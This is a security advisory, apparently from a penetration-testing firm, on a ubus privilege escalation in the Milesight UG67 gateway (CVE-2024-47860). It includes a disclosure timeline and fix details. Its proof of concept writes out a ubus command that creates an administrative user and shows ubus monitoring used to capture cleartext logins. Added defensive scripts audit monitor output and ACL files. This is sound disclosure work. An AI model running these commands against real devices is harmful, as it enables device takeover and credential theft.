Advisory: Milesight UG67: UBUS Allows for Privilege Escalation
Attackers who can execute commands on a Milesight UG67 LoRaWAN Gateway can
gain full root access by using `ubus` features.
### Details
- Product: Milesight UG67 Outdoor LoRaWAN Gateway
- Affected Versions: 60.0.0.42-r5, likely others
- Fixed Versions: 60.0.0.44
- Vulnerability Type: Local Privilege Escalation
- Security Risk: low
- Vendor URL: https://www.milesight.com/iot/product/lorawan-gateway/ug67
- Vendor Status: fixed version released
- Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2024-004
- Advisory Status: published
- CVE: CVE-2024-47860
- CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47860
### Introduction
The Milesight UG67 is a robust LoRaWAN® gateway designed for outdoor
deployments.
### More Details
Attackers who are able to execute commands with the privileges of any
user account on a Milesight UG67 LoRaWAN Gateway can use the `ubus`
inter-process-communication system to read `ubus` messages of other processes and call `ubus` functions.
This allows, for example, creating new users with administrative privileges or
obtaining the cleartext credentials of other users, including administrative
accounts, as they authenticate to the device.
### Proof of Concept
Any user account with the ability to execute arbitrary commands on the
gateway (see
[rt-sa-2024-003](https://www.redteam-pentesting.de/advisories/rt-sa-2024-003)
on how to gain command execution via PostgreSQL) is able to use the
`ubus` command-line client to issue commands. In the following, a user
`redteam` is created via `ubus call`:
```
$ ubus call yruo_usermanagement add \
"{ \
'base': 'user_list', \
'index': 'user_listlvf0lwqg', \
'value': { \
'username': 'redteam', \
'old_username': 'username', \
'password': 'secretpassword', \
'permission': '1' \
}, \
'type': 'user_list', \
'ysusername': 'admin', \
'ysrole': 4 \
}"
```
Afterwards, it is possible to log in to the web interface with almost
full access. This allows reading and changing all configured values,
including all secrets.
To monitor traffic received by the ubusd server, the `ubus monitor`
command can be used:
```
$ ubus monitor
```
This includes the messages generated when a user authenticates to the
system via the web interface:
```
-> bd896693 #00000000 status: {"status":0}
[...]
<- bd896693 #9a5c2c32 invoke: {"objid": -1705235406, "method": "login",
"data": {"username": "admin",
"password": "xxxxxxxxxxxxxxxxxxxxxx",
"ubus_rpc_session": "000000[...]00",
"timeout": 1800, "ip": "127.0.0.1"}}
```
Since ubus passes the login details in the clear, attackers can collect
the credentials of all users who authenticate to the gateway while the
ubus traffic is being monitored.
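The following script is an added example for auditing a device from the defender's side; it is not part of the advisory and not code from Milesight or RedTeam Pentesting. It parses `ubus monitor` output in the line format shown above (a header line with direction, peer id, message hash and message type, followed by a JSON body that may continue over several lines) and reports every `invoke` message whose payload carries a secret-looking field, without reproducing the secret itself. The sample output, the placeholder password and the list of field names treated as secrets are constructed for this example.

```python
import json
import re

# Constructed sample of `ubus monitor` output, modelled on the excerpt in the
# advisory. The password and session values are placeholders, not real data.
SAMPLE_MONITOR_OUTPUT = """\
-> bd896693 #00000000 status: {"status":0}
<- bd896693 #9a5c2c32 invoke: {"objid": -1705235406, "method": "login",
"data": {"username": "admin",
"password": "PLACEHOLDER-NOT-A-REAL-PASSWORD",
"ubus_rpc_session": "00000000000000000000000000000000",
"timeout": 1800, "ip": "127.0.0.1"}}
-> bd896693 #9a5c2c32 status: {"status":0}
<- 1a2b3c4d #0badf00d invoke: {"objid": 42, "method": "status", "data": {}}
"""

# Header of a monitor line: direction, peer id, message hash, message type, body.
HEADER_RE = re.compile(r'^(->|<-) ([0-9a-f]+) #([0-9a-f]+) (\w+): (.*)$')

# Field names that should never cross an IPC bus in the clear (assumed list).
SECRET_FIELDS = {"password", "passwd", "secret", "token", "ubus_rpc_session"}


def parse_monitor(text):
    """Split monitor output into messages; JSON bodies may span several lines."""
    messages = []
    current = None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            if current:
                messages.append(current)
            direction, peer, msg_hash, msg_type, body = m.groups()
            current = {"direction": direction, "peer": peer, "hash": msg_hash,
                       "type": msg_type, "body": body}
        elif current is not None:
            # Continuation line of a multi-line JSON body.
            current["body"] += " " + line
    if current:
        messages.append(current)
    for msg in messages:
        try:
            msg["json"] = json.loads(msg["body"])
        except json.JSONDecodeError:
            msg["json"] = None
    return messages


def find_secret_paths(obj, path=()):
    """Yield (path, value) for every nested key whose name looks like a secret."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            if key.lower() in SECRET_FIELDS and isinstance(value, str):
                yield path + (key,), value
            yield from find_secret_paths(value, path + (key,))
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            yield from find_secret_paths(value, path + (str(index),))


def audit(text):
    """Return one finding per invoke message that carries a cleartext secret."""
    findings = []
    for msg in parse_monitor(text):
        if msg["type"] != "invoke" or msg["json"] is None:
            continue
        secrets = list(find_secret_paths(msg["json"]))
        if not secrets:
            continue
        findings.append({
            "peer": msg["peer"],
            "method": msg["json"].get("method"),
            "fields": [".".join(p) for p, _ in secrets],
            # Keep only the length so the finding itself does not leak the value.
            "redacted": {".".join(p): "*" * len(v) for p, v in secrets},
        })
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_MONITOR_OUTPUT):
        print(finding)
```

On a test device the script can be fed the live output of `ubus monitor` (run as root on a unit you administer) to enumerate which objects and methods pass secrets through the bus; those are the calls whose ACL entries deserve the most scrutiny when hardening the device.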
### Workaround and Fix
The ubus ACL should be modified so that low-privileged user accounts are
denied access to ubus by default.
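As an added example (not part of the advisory, and not Milesight or RedTeam Pentesting code), the script below audits ubusd ACL files for the kind of over-broad grant the workaround refers to. It assumes the JSON layout read by the ACL loader of OpenWrt's `ubusd` (one object per file with a `user` or `group` principal, an `access` table mapping object names to allowed `methods`, and `send`, `listen`, `subscribe` and `publish` lists), the conventional `/usr/share/acl.d/` directory, and a group named `users`; the UG67's actual ACL files are not shown in the advisory. A deliberately permissive ACL is constructed beside a restricted one so the check can be exercised offline.

```python
import glob
import json
import os

# Constructed ACL that grants a low-privileged group everything: every method on
# every object plus unrestricted event and monitoring capabilities.
WEAK_ACL = json.loads("""
{
  "group": "users",
  "access": { "*": { "methods": ["*"] } },
  "send": ["*"],
  "listen": ["*"],
  "subscribe": ["*"],
  "publish": ["*"]
}
""")

# Constructed ACL that only exposes a few read-only methods to the same group.
# Object and method names are assumptions chosen for illustration.
RESTRICTED_ACL = json.loads("""
{
  "group": "users",
  "access": {
    "system": { "methods": ["board", "info"] },
    "network.interface": { "methods": ["status", "dump"] }
  }
}
""")

# Capabilities that let a client inject events into, or observe, other clients.
BROAD_CAPABILITIES = ("send", "listen", "subscribe", "publish")


def acl_issues(acl):
    """Return a list of human-readable problems found in one ACL object."""
    who = acl.get("user") or acl.get("group") or "<unspecified principal>"
    issues = []
    for obj_pattern, grant in acl.get("access", {}).items():
        methods = grant.get("methods", [])
        if obj_pattern == "*" and "*" in methods:
            issues.append(f"{who}: may call every method on every object")
        elif "*" in methods:
            issues.append(f"{who}: may call every method on '{obj_pattern}'")
        elif obj_pattern == "*":
            issues.append(f"{who}: methods {methods} granted on every object")
    for capability in BROAD_CAPABILITIES:
        if "*" in acl.get(capability, []):
            issues.append(f"{who}: unrestricted '{capability}' capability")
    return issues


def audit_acl_dir(path="/usr/share/acl.d"):
    """Audit every *.json ACL file in a directory; returns {filename: [issues]}."""
    report = {}
    for fname in sorted(glob.glob(os.path.join(path, "*.json"))):
        with open(fname) as fh:
            try:
                acl = json.load(fh)
            except json.JSONDecodeError as exc:
                report[fname] = [f"unparseable ACL file: {exc}"]
                continue
        report[fname] = acl_issues(acl)
    return report


if __name__ == "__main__":
    for name, acl in (("weak", WEAK_ACL), ("restricted", RESTRICTED_ACL)):
        print(name, acl_issues(acl) or ["no issues"])
```

Run against a firmware image or a live device, `audit_acl_dir()` lists every principal that can call arbitrary objects or observe bus traffic; a hardened configuration should leave only the specific objects and methods each service account genuinely needs.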
### Security Risk
Attackers who are able to execute arbitrary commands on a Milesight UG67
LoRaWAN Gateway can collect valid user credentials by monitoring ubus
traffic or create new users with administrative privileges. This allows
attackers to completely take over the device and extract all configured
secrets.
Since all accounts except the root account only have a limited shell
configured, which does not allow executing arbitrary commands, this
attack requires another vulnerability (like
[rt-sa-2024-003](https://www.redteam-pentesting.de/advisories/rt-sa-2024-003))
to gain shell access. In combination, these vulnerabilities pose a high
risk.
### Timeline
- 2024-04-25 Vulnerability identified
- 2024-04-29 Customer approved disclosure to vendor
- 2024-05-14 Vendor notified
- 2024-06-28 Asked vendor for update
- 2024-07-03 Vendor will provide update by end of July
- 2024-07-24 Asked vendor for update
- 2024-07-30 Vendor stated: Work in progress
- 2024-08-09 Vendor stated: Fix expected Q3/24
- 2024-09-24 CVE ID requested
- 2024-09-24 Asked vendor for update
- 2024-09-24 Vendor stated: Fix in 60.0.0.44
- 2024-10-04 CVE ID assigned
- 2024-10-07 Asked vendor for update
- 2024-10-08 Vendor stated: Fix will be available mid-October
- 2024-10-18 Asked vendor for update
- 2024-10-21 Vendor stated: Fix will be available mid-November
- 2024-11-04 Vendor released fixed version for testing
- 2024-11-05 Vendor released fixed version
- 2024-12-10 Customer approved public release of vulnerability details
- 2024-12-10 Advisory released
### RedTeam Pentesting GmbH
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. In this way, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only a few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
### Working at RedTeam Pentesting
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit: